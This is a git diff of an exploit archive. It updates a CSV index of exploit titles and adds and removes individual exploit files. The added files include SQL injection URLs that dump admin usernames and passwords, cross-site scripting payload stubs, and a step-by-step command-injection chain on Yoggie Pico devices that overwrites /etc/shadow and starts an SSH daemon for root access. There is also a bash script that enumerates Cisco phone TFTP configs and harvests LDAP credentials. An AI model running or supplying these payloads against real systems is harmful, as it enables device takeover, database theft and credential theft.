diff --git a/files.csv b/files.csv
index c35cec951..429ab09cd 100755
--- a/files.csv
+++ b/files.csv
@@ -26833,7 +26833,7 @@ id,file,description,date,author,platform,type,port
 29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 Level2.PHP Remote File Include Vulnerability",2007-04-23,Dr.RoVeR,php,webapps,0
 29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 Init.Inc.PHP Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0
 29880,platforms/php/webapps/29880.txt,"File117 Multiple Remote File Include Vulnerabilities",2007-04-23,InyeXion,php,webapps,0
-29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader ASLR/DEP Bypass Exploit with SANDBOX BYPASS",2013-11-28,"w3bd3vil and abh1sek",windows,local,0
+29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR/DEP Bypass Exploit with SANDBOX BYPASS",2013-11-28,"w3bd3vil and abh1sek",windows,local,0
 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 Article.PHP SQL Injection Vulnerability",2007-04-23,"John Martinelli",php,webapps,0
 29883,platforms/php/webapps/29883.txt,"ACVSWS Transport.PHP Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0
 29884,platforms/multiple/remote/29884.txt,"Apple Quicktime <= 7.1.5 QTJava toQTPointer() Java Handling Arbitrary Code Execution Vulnerability",2007-04-23,"Shane Macaulay",multiple,remote,0
@@ -26955,19 +26955,19 @@ id,file,description,date,author,platform,type,port
 30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 LocalizerConfig.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
 30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 LocalizerLanguage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0
 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad# 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0
-30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager Arbitrary File Upload",2013-12-03,metasploit,java,remote,0
+30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload",2013-12-03,metasploit,java,remote,0
 30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe - Remote Code Execution",2013-12-03,metasploit,windows,remote,12221
 30010,platforms/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection",2013-12-03,metasploit,php,remote,80
 30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0
 30012,platforms/php/webapps/30012.txt,"Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
-30014,platforms/windows/local/30014.py,"Windows NDPROXY Local SYSTEM Privilege Escalation",2013-12-03,ryujin,windows,local,0
+30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation",2013-12-03,ryujin,windows,local,0
 30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Include Vulnerability",2007-05-08,netVigilance,php,webapps,0
 30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp Frameset-7.HTML Cross-Site Scripting Vulnerability",2007-05-08,"Michael Domberg",windows,remote,0
 30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 DOP Command Local Privilege Escalation Vulnerability",2007-05-08,"Daniele Calore",unix,local,0
 30018,platforms/linux/remote/30018.py,"Python 2.5 PyLocale_strxfrm Function Remote Information Leak Vulnerability",2007-05-08,"Piotr Engelking",linux,remote,0
 30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0
-30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x IF Query Handling Remote Denial Of Service Vulnerability",2013-12-04,"Neil Kettle",linux,dos,0
+30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial Of Service Vulnerability",2013-12-04,"Neil Kettle",linux,dos,0
 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x Arbitrary File Read Local Information Disclosure Vulnerability",2007-05-10,Anonymous,solaris,local,0
 30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.PHP Cross-Site Scripting Vulnerability",2007-05-10,the_Edit0r,php,webapps,0
 30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b Multiple Denial Of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0
@@ -27089,7 +27089,7 @@ id,file,description,date,author,platform,type,port
 30152,platforms/php/webapps/30152.txt,"My Databook diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0
 30153,platforms/php/webapps/30153.txt,"My Databook diary.php year Parameter XSS",2007-06-04,Serapis.net,php,webapps,0
 30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0
-30155,platforms/php/webapps/30155.txt,"Wordpress TDO-Mini-Forms Plugin - Arbitrary File Upload Vulnerability",2013-12-09,"terminator ashiyane",php,webapps,0
+30155,platforms/php/webapps/30155.txt,"Wordpress TDO-Mini-Forms 0.13.9 Plugin - Arbitrary File Upload Vulnerability",2013-12-09,"terminator ashiyane",php,webapps,0
 30156,platforms/cgi/webapps/30156.txt,"CGILua <= 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0
 30157,platforms/php/webapps/30157.txt,"Joomla JD-Wiki 1.0.2 dwpage.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0
 30158,platforms/php/webapps/30158.txt,"Joomla JD-Wiki 1.0.2 wantedpages.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0
@@ -27121,11 +27121,10 @@ id,file,description,date,author,platform,type,port
 30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability",2007-06-14,Anonymous,jsp,webapps,0
 30190,platforms/php/webapps/30190.txt,"Joomla! Letterman Subscriber Module 1.2.4 Mod_Lettermansubscribe.PHP Cross-Site Scripting Vulnerability",2007-06-14,"Edi Strosar",php,webapps,0
 30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability",2007-06-14,"Rajat Swarup",jsp,webapps,0
-30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6 SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0
+30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0
 30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability",2007-06-16,Lostmon,windows,dos,0
 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability",2007-06-16,azizov,windows,dos,0
-30195,platforms/asp/webapps/30195.txt,"Webnet Studio - SQL Injection Vulnerability",2013-12-10,"a a",asp,webapps,0
-30196,platforms/windows/local/30196.py,"Mediacoder v0.8.0 (m3u) - Buffer Overflow Vulnerability",2013-12-10,"Return C",windows,local,0
+30196,platforms/windows/local/30196.py,"Mediacoder 0.8.0 (m3u) - Buffer Overflow Vulnerability",2013-12-10,"Return C",windows,local,0
 30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 Content.PHP SQL Injection Vulnerability",2007-06-18,"Jesper Jurcenoks",php,webapps,0
 30198,platforms/asp/webapps/30198.txt,"TDizin Arama.ASP Cross-Site Scripting Vulnerability",2007-06-18,GeFORC3,asp,webapps,0
 30199,platforms/cgi/webapps/30199.txt,"WebIf OutConfig Parameter Local File Include Vulnerability",2007-06-18,maiosyet,cgi,webapps,0
@@ -27138,10 +27137,79 @@ id,file,description,date,author,platform,type,port 30206,platforms/cfm/webapps/30206.txt,"FuseTalk <= 4.0 forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",cfm,webapps,0 30207,platforms/asp/webapps/30207.txt,"FuseTalk <= 4.0 blog/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",asp,webapps,0 30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 (.ico) - Buffer Overflow Vulnerability",2013-12-11,"Core Security",windows,dos,0 -30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin Web Service Directory Traversal",2013-12-11,metasploit,windows,remote,8080 -30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 Administrative Login Bypass",2013-12-11,metasploit,multiple,remote,80 -30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet RCE",2013-12-11,rgod,windows,remote,0 -30212,platforms/php/remote/30212.rb,"vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80 -30213,platforms/php/webapps/30213.txt,"eFront v3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0 -30214,platforms/php/webapps/30214.txt,"Wordpress Skinizer Theme - Remote File Upload Vulnerability",2013-12-11,"terminator ashiyane",php,webapps,0 +30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal",2013-12-11,metasploit,windows,remote,8080 +30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass",2013-12-11,metasploit,multiple,remote,80 +30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE",2013-12-11,rgod,windows,remote,0 +30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80 
+30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0 30215,platforms/hardware/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,hardware,webapps,0 +30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 AuthError.CFM Multiple Cross Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 +30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0 +30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0 +30219,platforms/multiple/remote/30219.txt,"MyServer 0.8.9 Filename Parse Error Information Disclosure Vulnerability",2007-06-21,"Shay Priel",multiple,remote,0 +30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 Index.PHP Local File Include Vulnerability",2007-06-21,r0t,php,webapps,0 +30221,platforms/php/webapps/30221.txt,"PHPAccounts 0.5 Index.PHP Multiple SQL Injection Vulnerabilities",2007-06-21,r0t,php,webapps,0 +30222,platforms/multiple/remote/30222.txt,"MyServer 0.9.8 Post.MSCGI Cross-Site Scripting Vulnerability",2007-01-02,Prili,multiple,remote,0 +30223,platforms/php/webapps/30223.txt,"NetClassifieds <= 1.9.7 Multiple Input Validation Vulnerabilities",2007-06-21,"Laurent Gaffie",php,webapps,0 +30224,platforms/windows/dos/30224.py,"Ingress Database Server 2.6 Multiple Remote Vulnerabilities",2007-06-21,Anonymous,windows,dos,0 +30225,platforms/php/webapps/30225.txt,"eNdonesia 8.4 mod.php viewarticle Action artid Parameter SQL Injection",2007-06-22,"Laurent Gaffie",php,webapps,0 +30226,platforms/php/webapps/30226.txt,"eNdonesia 8.4 banners.php click Action bid Parameter SQL Injection",2007-06-22,"Laurent Gaffie",php,webapps,0 +30227,platforms/php/webapps/30227.txt,"Joomla/Mambo Mod_Forum Component PHPBB_Root.PHP Remote 
File Include Vulnerability",2007-06-22,spymeta,php,webapps,0 +30228,platforms/osx/remote/30228.txt,"Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability",2007-06-22,"Richard Moore",osx,remote,0 +30229,platforms/multiple/remote/30229.txt,"SHTTPD 1.38 Filename Parse Error Information Disclosure Vulnerability",2007-06-25,"Shay Priel",multiple,remote,0 +30230,platforms/php/webapps/30230.txt,"MyNews 0.10 AuthACC SQL Injection Vulnerability",2007-06-25,netVigilance,php,webapps,0 +30231,platforms/multiple/remote/30231.txt,"Key Focus Web Server 3.1 Index.WKF Cross-Site Scripting Vulnerability",2007-06-25,"Shay Priel",multiple,remote,0 +30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 +30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0 +30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 +30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"Ramdan Yantu",php,webapps,0 +30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0 +30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0 +30239,platforms/php/webapps/30239.txt,"Wordpress Plugin SEM WYSIWYG - Remote File Upload Vulnerability",2013-12-12,"Great Cyrus",php,webapps,0 +30243,platforms/php/webapps/30243.txt,"Veno File Manager - Arbitrary File Download Vulnerability",2013-12-12,"Daniel Godoy",php,webapps,0 +30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - (.pls) DEP Exploit",2013-12-12,"Morteza Hashemi",windows,local,0 +30245,platforms/hardware/webapps/30245.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple 
Vulnerabilities",2013-12-12,Vulnerability-Lab,hardware,webapps,0 +30246,platforms/php/webapps/30246.txt,"WHMCS v4.x & v5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0 +30247,platforms/php/webapps/30247.txt,"Telmanik CMS v1.01 - Multiple Web Vulnerabilities",2013-12-12,"JoKeR DZ",php,webapps,0 +30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0 +30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 Plugin.PHP Authentication Bypass Vulnerability",2007-06-27,"Nico Leidecker",php,webapps,0 +30250,platforms/asp/webapps/30250.txt,"DUClassmate 1.x ICity Parameter SQL Injection Vulnerability",2006-12-02,"Aria-Security Team",asp,webapps,0 +30251,platforms/linux/dos/30251.c,"GD Graphics Library <= 2.0.34 (libgd) gdImageCreateXbm Function Unspecified DoS",2007-06-26,Anonymous,linux,dos,0 +30252,platforms/windows/dos/30252.py,"Conti FTP Server 1.0 Large String Denial of Service Vulnerability",2007-06-27,35c666,windows,dos,0 +30253,platforms/php/webapps/30253.txt,"ETicket 1.5.5 Open.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-06-27,"Jesper Jurcenoks",php,webapps,0 +30254,platforms/hardware/remote/30254.txt,"Linksys Wireless-G ADSL Gateway WAG54GS 1.0.6 Setup.CGI Cross-Site Scripting Vulnerabilities",2007-06-27,"Petko Petkov",hardware,remote,0 +30255,platforms/windows/dos/30255.txt,"PC SOFT WinDEV 11 WDP File Parsing Stack Buffer Overflow Vulnerability",2007-06-28,"Jerome Athias",windows,dos,0 +30256,platforms/multiple/remote/30256.txt,"Oracle Rapid Install Web Server Secondary Login Page Cross Site Scripting Vulnerability",2007-06-28,"Kaushal Desai",multiple,remote,0 +30257,platforms/windows/remote/30257.html,"HP Instant Support ActiveX Control Driver Check Buffer Overflow Vulnerability",2007-04-01,"John Heasman",windows,remote,0 +30258,platforms/php/webapps/30258.txt,"LightBlog <= 5 Add_Comment.PHP Cross-Site Scripting 
Vulnerability",2007-07-02,Serapis.net,php,webapps,0 +30259,platforms/php/webapps/30259.txt,"Claroline <= 1.8.3 $_SERVER['PHP_SELF'] Parameter Multiple Cross-Site Scripting Vulnerabilities",2007-07-02,munozferna,php,webapps,0 +30260,platforms/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks Remote Code Execution Vulnerability",2007-07-02,"Cody Brocious",cgi,webapps,0 +30261,platforms/php/webapps/30261.txt,"Moodle 1.7.1 Index.PHP Cross Site Scripting Vulnerability",2007-07-02,MustLive,php,webapps,0 +30262,platforms/php/webapps/30262.txt,"Liesbeth Base CMS Information Disclosure Vulnerability",2007-07-02,durito,php,webapps,0 +30263,platforms/cgi/webapps/30263.txt,"Oliver Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps,0 +30264,platforms/multiple/remote/30264.txt,"Fujitsu ServerView <= 4.50.8 DBASCIIAccess Remote Command Execution Vulnerability",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote,0 +30265,platforms/multiple/remote/30265.txt,"SAP Message Server Group Parameter Remote Buffer Overflow Vulnerability",2007-07-05,"Mark Litchfield",multiple,remote,0 +30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 /jspui/applicationList.jsp alpha Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 +30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 /jspui/appConfig.jsp task Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 +30268,platforms/jsp/webapps/30268.txt,"NetFlow Analyzer 5 netflow/jspui/index.jsp view Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 +30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 /jspui/selectDevice.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 +30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 /jspui/customReport.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 +30271,platforms/java/webapps/30271.txt,"OpManager 6/7 ping.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0 +30272,platforms/java/webapps/30272.txt,"OpManager 6/7 traceRoute.do name Parameter 
XSS",2007-07-04,Lostmon,java,webapps,0 +30273,platforms/java/webapps/30273.txt,"OpManager 6/7 reports/ReportViewAction.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0 +30274,platforms/java/webapps/30274.txt,"OpManager 6/7 admin/ServiceConfiguration.do operation Parameter XSS",2007-07-04,Lostmon,java,webapps,0 +30275,platforms/java/webapps/30275.txt,"OpManager 6/7 admin/DeviceAssociation.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0 +30276,platforms/java/webapps/30276.txt,"OpManager 6/7 map/traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0 +30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 Login.PHP Multiple Local File Include Vulnerabilities",2007-07-05,"Adriel T. Desautels",php,webapps,0 +30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 +30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server <= 7.0 PARAMS Cross Site Scripting Vulnerability",2007-07-05,"Mark Litchfield",multiple,remote,0 +30280,platforms/linux/local/30280.txt,"GFax 0.7.6 Temporary Files Local Arbitrary Command Execution Vulnerability",2007-07-05,"Steve Kemp",linux,local,0 +30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework <= 2.0 Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0 +30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 Oku.ASP SQL Injection Vulnerability",2007-07-07,GeFORC3,asp,webapps,0 +30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0/2.1 Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 +30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 Web Start JNLP File Stack Buffer Overflow Vulnerability",2007-07-09,"Daniel Soeder",linux,remote,0 +30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox URI Handler 
Command Injection Vulnerability",2007-07-10,"Thor Larholm",linux,remote,0 +30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 Template Parameter Local File Include Vulnerability",2007-07-10,"Tim Brown",linux,remote,0 +30287,platforms/windows/remote/30287.txt,"TippingPoint IPS Unicode Character Detection Bypass Vulnerability",2007-07-10,Security-Assessment.com,windows,remote,0 +30288,platforms/multiple/remote/30288.txt,"Adobe Flash Player <= 8.0.24 SWF File Handling Remote Code Execution Vulnerability",2007-07-10,"Stefano DiPaola",multiple,remote,0 +30289,platforms/asp/webapps/30289.txt,"EnViVo!CMS Default.ASP ID Parameter SQL Injection Vulnerability",2007-07-11,durito,asp,webapps,0 diff --git a/platforms/asp/webapps/30195.txt b/platforms/asp/webapps/30195.txt deleted file mode 100755 index f52da411a..000000000 --- a/platforms/asp/webapps/30195.txt +++ /dev/null @@ -1,20 +0,0 @@ -#******************************************************************************** -# Exploit Title : Webnet Studio Sql Injection Vulnerability -# -# Exploit Author : Ashiyane Digital Security Team -# -# Vendor Homepage : http://www.webnetstudio.it -# -# Google Dork : intext:"powered by Webnet Studio" -# -# Date: 2013-12-10 -# -# Tested on: Windows 7 , Linux -# -# discovered by : ACC3SS -------------------------------------------------------------------- -# Exploit : Sql Injection -# -# Location : [Target]/content.asp?ID=[Sql Injection] -# -###################### \ No newline at end of file diff --git a/platforms/asp/webapps/30250.txt b/platforms/asp/webapps/30250.txt new file mode 100755 index 000000000..8f6e5d31b --- /dev/null +++ b/platforms/asp/webapps/30250.txt 
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24637/info
+
+DUClassmate is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/default.asp?iCity=[SQL Injection]
\ No newline at end of file
diff --git a/platforms/asp/webapps/30282.txt b/platforms/asp/webapps/30282.txt
new file mode 100755
index 000000000..9f6558ec8
--- /dev/null
+++ b/platforms/asp/webapps/30282.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24794/info
+
+Levent Veysi Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+This issue affects Levent Veysi Portal 1.0; other versions may also be affected.
+
+http://www.example.com/script_path/oku.asp?id=-1+union+select+0,1,kullaniciadi,sifre+from+admin
\ No newline at end of file
diff --git a/platforms/asp/webapps/30289.txt b/platforms/asp/webapps/30289.txt
new file mode 100755
index 000000000..a2b28718e
--- /dev/null
+++ b/platforms/asp/webapps/30289.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24860/info
+
+enVivo!CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+All versions are considered vulnerable to this issue.
+
+http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)--
\ No newline at end of file
diff --git a/platforms/cfm/webapps/30216.txt b/platforms/cfm/webapps/30216.txt
new file mode 100755
index 000000000..c4dc13859
--- /dev/null
+++ b/platforms/cfm/webapps/30216.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/24564/info
+
+FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/forum/include/error/autherror.cfm?errorcode=1
+&FTVAR_LINKP=[xss]
+
+http://www.example.com/blog/forum/include/error/autherror.cfm?errorcode=1
+&FTVAR_URLP=[xss]
\ No newline at end of file
diff --git a/platforms/cgi/webapps/30260.txt b/platforms/cgi/webapps/30260.txt
new file mode 100755
index 000000000..283bb5e0a
--- /dev/null
+++ b/platforms/cgi/webapps/30260.txt
@@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/24743/info + +Yoggie Pico and Pico Pro are prone to a remote code-execution vulnerability because the device fails to sufficiently sanitize user-supplied input. + +An attacker can exploit this issue to execute arbitrary code with superuser privileges. A successful exploit will result in the complete compromise of affected devices. + +When run from a machine with a Yoggie Pico Pro connected, +yoggie.yoggie.com resolves to the IP of the device, so these links +will of course not work unless you have a device connected. I didn't +brute-force the root password, so I explain how you can replace their +/etc/shadow to set the password to whatever you choose. + +To access the original /etc/shadow: +https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping¶m=%60cp%20/etc/shadow%20shadow.txt%60 +https://yoggie.yoggie.com:8443/cgi-bin/shadow.txt +Replace the root password with the password of your choosing, then +wrap the file in single quotes and urlencode the entire string. + +To replace the original /etc/shadow with your own: +https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping¶m=%60echo%20%20%3E%20/etc/shadow%60 + +Finally, running dropbear sshd on port 7290 (random choice -- not +blocked by their firewall rules) +https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping¶m=%60/usr/sbin/dropbear%20-p%207290%60 + +Log in as root with the password chosen, and you now have complete +control over the device. It's quite powerful little computer, and a +whole hell of a lot of fun to play around with. A word of advice, +though -- don't touch libc in any way, shape, or form, as there's no +reflash mechanism I've found on the device, which is why I now have a +bricked pico pro sitting on my desk ;) diff --git a/platforms/cgi/webapps/30263.txt b/platforms/cgi/webapps/30263.txt new file mode 100755 index 000000000..126067d78 --- /dev/null +++ b/platforms/cgi/webapps/30263.txt 
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24754/info
+
+Oliver is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/oliver/gateway/gateway.exe?X_=000f&application=Oliver&displayform=main&updateform="> http://www.example.com/oliver/gateway/gateway.exe?X_=000f&displayform=main">
\ No newline at end of file
diff --git a/platforms/hardware/local/30237.sh b/platforms/hardware/local/30237.sh
new file mode 100755
index 000000000..728ad27d7
--- /dev/null
+++ b/platforms/hardware/local/30237.sh
@@ -0,0 +1,42 @@ +#!/bin/bash +####################################################################### +# Proof of Concept on how to get tftp config files from cisco phones # +# This can be performed anonymously and privileges gathered relies on # +# those assigned to the ldap account # +# Developed by Daniel Svartman (danielsvartman@gmail.com # +# In case tftp files are encrypted, you will need to hijack a phone # +# and download the decryption key from the ROM memory # +####################################################################### + +# This example below is for enumerating and downloading configuration files from phones +# With this you can gather personal information and sometimes also credentials from LDAP +# The first 8 digits of the MAC address relies on cisco mac address used by phones +# While the last 4 are generated automatically + +BASE_MAC=$1 +TFTP_SERVER=$2 + +perl -e '$var = 0x0001; for (1 .. 65535 ) { printf qq[%04X\n], $var++ }' > mac.txt + +#Now we should download the files +while read LINE; do + tftp ${TFTP_SERVER} -c get SEP${BASE_MAC}${LINE}.cnf.xml +done < mac.txt + +#Finally, we download and process also the SPDefault.cnf.xml file +tftp ${TFTP_SERVER} -c get SPDefault.cnf.xml +USERID=`grep "UseUserCredential" SPDefault.cnf.xml | cut -d ">" -f 6 | cut -d "<" -f 1` +echo "USERID: " $USERID > credentials.txt +PWD=`grep "UseUserCredential" SPDefault.cnf.xml | cut -d ">" -f 8 | cut -d "<" -f 1` +echo "PWD: " $PWD >> credentials.txt +BASE_DN=`grep "UseUserCredential" SPDefault.cnf.xml | cut -d ">" -f 10 | cut -d "<" -f 1` +echo "BASE_DN: " $BASE_DN >> credentials.txt +while read LINE; do + if [ "$LINE" = "Directory" ]; then + read LINE + ADDRESS=`echo $LINE | cut -d ">" -f 2 | cut -d "<" -f 1` + echo "LDAP_IP_ADDRESS: " $ADDRESS >> credentials.txt + fi +done < SPDefault.cnf.xml + +echo "Done - Please, check credentials.txt file, also review all the SEPxxxx.cnf.xml files for further credentials" \ No newline at end of file 
diff --git a/platforms/hardware/remote/30254.txt b/platforms/hardware/remote/30254.txt
new file mode 100755
index 000000000..940af08a6
--- /dev/null
+++ b/platforms/hardware/remote/30254.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/24682/info
+
+Linksys Wireless-G ADSL Gateway is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+Attackers may exploit this issue by enticing victims into opening a malicious URI.
+
